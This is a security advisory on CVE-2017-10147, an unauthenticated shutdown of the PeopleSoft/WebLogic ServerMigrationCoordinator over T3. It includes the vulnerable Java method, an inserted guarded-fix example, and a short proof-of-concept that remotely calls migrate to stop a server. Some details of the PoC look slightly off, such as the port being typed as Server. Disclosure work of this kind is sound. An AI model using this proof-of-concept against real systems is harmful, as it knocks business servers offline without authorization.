Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Missing Authentication for Critical Function
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication
Risk: High
Impact: Impact on availability
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10147
CVSS Information
CVSS Base Score v3: 8.6 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N)
AC: Attack Complexity (Required attack complexity) | Low (L)
PR: Privileges Required (Level of privileges needed to exploit) | None (N)
UI: User Interaction (Required user participation) | None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C)
C: Impact to Confidentiality | None (N)
I: Impact to Integrity | None (N)
A: Impact to Availability | High (H)
VULNERABILITY DESCRIPTION
An attacker can send a special T3 request to stop the remote server.
VULNERABLE PACKAGES
PeopleSoft FSCM 9.2
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, apply Oracle CPU July 2017.
TECHNICAL DESCRIPTION
The vulnerability is present in the migrate functionality of the WebLogic/cluster/singleton/ServerMigrationCoordinator class.
When the migrate function is called over the T3 protocol, the PeopleSoft server is stopped without authorization.
@Override
public void migrate(final String serverName, final String sourceMachine,
        final String destinationMachine, final boolean sourceDown,
        final boolean destinationDown) throws ServerMigrationException {
    // Nothing in this method checks the caller's identity or privileges.
    ServerMigrationTask task = this.taskMap.get(serverName);
    if (task == null) {
        task = new ServerMigrationTask(serverName, destinationMachine);
        if (MigrationDebugLogger.isDebugEnabled()) {
            MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
        }
        this.taskMap.put(serverName, task);
        try {
            // The named server is stopped here, then started on the destination.
            this.stopServer(sourceDown, task);
            this.startServer(destinationDown, task);
        } finally {
            this.taskMap.remove(serverName);
        }
        return;
    }
    // A task for this server is already registered.
    throw new ServerMigrationException("Migration operation in progress", null);
}
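The fix pattern for the missing check, as an added example (not Oracle's patch and not code from the advisory): a self-contained model of the coordinator in which migrate authorizes the caller before any side effect. The Caller type, the "Admin" role name, the machine name and the simulated stop/start list are assumptions made for illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

public class GuardedMigrationCoordinator {
    // Hypothetical caller identity. In a real container it must come from the
    // authenticated subject bound to the remote call, never from call arguments.
    record Caller(String name, Set<String> roles) {
        static final Caller ANONYMOUS = new Caller("<anonymous>", Set.of());
    }

    private final Map<String, String> taskMap = new ConcurrentHashMap<>();
    final List<String> actions = new ArrayList<>(); // simulated stop/start calls

    public void migrate(Caller caller, String serverName, String destinationMachine) {
        // Authorize first and fail closed: no task is registered and no server
        // is touched for an unauthenticated or unprivileged caller.
        if (caller == null || !caller.roles().contains("Admin")) {
            throw new SecurityException("migrate denied for "
                    + (caller == null ? "null caller" : caller.name()));
        }
        // One migration per server at a time, as in the original method,
        // using an atomic putIfAbsent instead of separate get and put.
        if (taskMap.putIfAbsent(serverName, destinationMachine) != null) {
            throw new IllegalStateException("Migration operation in progress");
        }
        try {
            actions.add("stop " + serverName);
            actions.add("start " + serverName + " on " + destinationMachine);
        } finally {
            taskMap.remove(serverName);
        }
    }

    public static void main(String[] args) {
        GuardedMigrationCoordinator c = new GuardedMigrationCoordinator();
        try {
            c.migrate(Caller.ANONYMOUS, "PIA", "machine-b"); // constructed values
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("actions after anonymous call: " + c.actions);
        c.migrate(new Caller("ops-admin", Set.of("Admin")), "PIA", "machine-b");
        System.out.println("actions after admin call: " + c.actions);
    }
}
```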
Proof of Concept
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT)
        throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    p.put(Context.PROVIDER_URL, "t3://"+PS_SERVER_IP+":"+PS_SERVER_PORT);
    Context ctx = new InitialContext(p);
    Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
    Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
    ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
    h.migrate("PIA","а","any_data_or_ip", true, true);
    return false;
}
The post [ERPSCAN-17-041] Unauthorized Container Shutdown In ServerMigrationCoordinator appeared first on ERPScan.